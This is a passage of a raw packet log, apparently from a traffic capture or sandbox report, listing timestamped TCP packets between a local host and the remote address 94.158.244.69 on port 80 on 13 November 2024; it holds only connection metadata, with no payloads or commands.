                                                          Nov 13, 2024 10:53:02.035676956 CET804998694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:02.683010101 CET4998880192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:02.687928915 CET804998894.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:02.688122988 CET4998880192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:02.688122988 CET4998880192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:02.688472986 CET4998880192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:02.692950010 CET804998894.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:02.693331957 CET4998880192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:02.693377018 CET804998894.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:02.693387032 CET804998894.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:02.693394899 CET804998894.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:02.693402052 CET804998894.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:02.693423986 CET804998894.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:02.693433046 CET804998894.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:02.693434000 CET4998880192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:02.693460941 CET4998880192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:02.693496943 CET804998894.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:02.693506002 CET804998894.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:02.693514109 CET804998894.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:02.698324919 CET804998894.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:02.698350906 CET804998894.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:02.698390961 CET804998894.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:02.698399067 CET804998894.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:02.698419094 CET804998894.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:02.698427916 CET804998894.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:02.745474100 CET804998894.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:11.168881893 CET804998894.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:11.639908075 CET4998980192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:11.644833088 CET804998994.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:11.644927979 CET4998980192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:11.645047903 CET4998980192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:11.645447016 CET4998980192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:11.649898052 CET804998994.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:11.650347948 CET804998994.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:20.128329039 CET804998994.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:20.128560066 CET4998980192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:20.128560066 CET4998980192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:20.133526087 CET804998994.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:20.833333969 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:20.838397026 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:20.838622093 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:20.838767052 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:20.839282036 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:20.843905926 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:20.843975067 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:20.844161987 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:20.844175100 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:20.844185114 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:20.844211102 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:20.844213009 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:20.844221115 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:20.844230890 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:20.844244957 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:20.844288111 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:20.844295025 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:20.844338894 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:20.844376087 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:20.844418049 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:20.848659039 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:20.848722935 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:20.848788023 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:20.848831892 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:20.848995924 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:20.849009037 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:20.849028111 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:20.849044085 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:20.849071026 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:20.849121094 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:20.849131107 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:20.849173069 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:20.849342108 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:20.849421024 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:20.901541948 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:20.901729107 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:20.949690104 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:20.949830055 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:20.998003960 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:20.998234987 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:21.045511007 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:21.045603037 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:21.097444057 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:21.097497940 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:21.145625114 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:21.145767927 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:21.193506956 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:21.193651915 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:21.241466045 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:21.241560936 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:21.293589115 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:21.293653965 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:21.341557980 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:21.341671944 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:21.393424988 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:21.393594027 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:21.445475101 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:21.445766926 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:21.497605085 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:21.497873068 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:21.545433044 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:21.547333956 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:21.597492933 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:21.597754002 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:21.645518064 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:21.645620108 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:21.693523884 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:21.693640947 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:21.745646000 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:21.745712042 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:21.793454885 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:21.794454098 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:21.845561028 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:21.847143888 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:21.897805929 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:21.898736954 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:21.945605993 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:21.946157932 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:21.993463993 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:21.994668007 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:22.045423985 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:22.047043085 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:22.093429089 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:22.094681978 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:22.145442963 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:22.145555019 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:22.193407059 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:22.193572998 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:22.245548010 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:22.246560097 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:22.293684006 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:22.293838024 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:22.345371008 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:22.347047091 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:22.397468090 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:22.397520065 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:22.445485115 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:22.445576906 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:22.493496895 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:22.493602991 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:22.541548967 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:22.541654110 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:22.589509964 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:22.589596987 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:22.641514063 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:22.641702890 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:22.689485073 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:22.689565897 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:22.737366915 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:22.737472057 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:22.785581112 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:22.785773039 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:22.833481073 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:22.833648920 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:22.881509066 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:22.881664991 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:22.929502010 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:22.929560900 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:22.977705002 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:22.977761030 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:23.025525093 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:23.025636911 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:23.073666096 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:23.073786974 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:23.121480942 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:23.121547937 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:23.169558048 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:23.169766903 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:23.217628956 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:23.217936039 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:23.265487909 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:23.265610933 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:23.313482046 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:23.313604116 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:23.361417055 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:23.361566067 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:23.409426928 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:23.409605026 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:23.461493015 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:23.461632013 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:23.513549089 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:23.513657093 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:23.561641932 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:23.561717033 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:23.615430117 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:23.615561962 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:23.661468983 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:23.661591053 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:23.709466934 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:23.709573030 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:23.757411957 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:23.757517099 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:23.809478998 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:23.809616089 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:23.861493111 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:23.861677885 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:23.909475088 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:23.909605980 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:23.961488008 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:23.961635113 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:24.009421110 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:24.009501934 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:24.057482958 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:24.057580948 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:24.105415106 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:24.105467081 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:24.153433084 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:24.153510094 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:24.201425076 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:24.201539040 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:24.253484964 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:24.253532887 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:24.303544998 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:24.303612947 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:24.349380970 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:24.349708080 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:24.397382975 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:24.397500038 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:24.445436954 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:24.445514917 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:24.493377924 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:24.493557930 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:24.541448116 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:24.541555882 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:24.593482971 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:24.593594074 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:24.641417980 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:24.641482115 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:24.693341970 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:24.693397999 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:24.741395950 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:24.741620064 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:24.789378881 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:24.789468050 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:24.837502956 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:24.837738037 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:24.885490894 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:24.885632038 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:24.933406115 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:24.933523893 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:24.981601954 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:24.981698990 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:25.033689022 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:25.033821106 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:25.083425999 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:25.083560944 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:25.133523941 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:25.133759022 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:25.185411930 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:25.185616016 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:25.237472057 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:25.237524986 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:25.287305117 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:25.287375927 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:25.333596945 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:25.333661079 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:25.383364916 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:25.383415937 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:25.435394049 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:25.435442924 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:25.483458042 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:25.483671904 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:25.531362057 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:25.531441927 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:25.583486080 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:25.583555937 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:25.629513025 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:25.629676104 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:25.681452036 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:25.681555033 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:25.729475021 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:25.729582071 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:25.777445078 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:25.777510881 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:25.825654030 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:25.825711966 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:25.877520084 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:25.877729893 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:25.925457954 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:25.925594091 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:25.973452091 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:25.973563910 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:26.023403883 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:26.023538113 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:26.069453001 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:26.069667101 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:26.123420000 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:26.123502970 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:26.171299934 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:26.171431065 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:26.217500925 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:26.217633963 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:26.265464067 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:26.265599012 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:26.314007044 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:26.314126015 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:26.361422062 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:26.361474037 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:26.409388065 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:26.409442902 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:26.457364082 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:26.457456112 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:26.509608984 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:26.510082006 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:26.557606936 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:26.557730913 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:26.605593920 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:26.605714083 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:26.657567978 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:26.657691956 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:26.709443092 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:26.709573030 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:26.757488966 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:26.757705927 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:26.805428982 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:26.805660009 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:26.853458881 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:26.853615999 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:26.901489973 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:26.901559114 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:26.949511051 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:26.949584007 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:26.997884989 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:26.997981071 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:27.045496941 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:27.045747042 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:27.093436003 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:27.093533039 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:27.145478010 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:27.145586967 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:27.197475910 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:27.197557926 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:27.245421886 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:27.245661020 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:27.294351101 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:27.294419050 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:27.341387033 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:27.341490984 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:27.389519930 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:27.389585972 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:27.437482119 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:27.437601089 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:27.485371113 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:27.485424995 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:27.537421942 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:27.537522078 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:27.585436106 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:27.585500956 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:27.637412071 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:27.637492895 CET4999080192.168.2.694.158.244.69
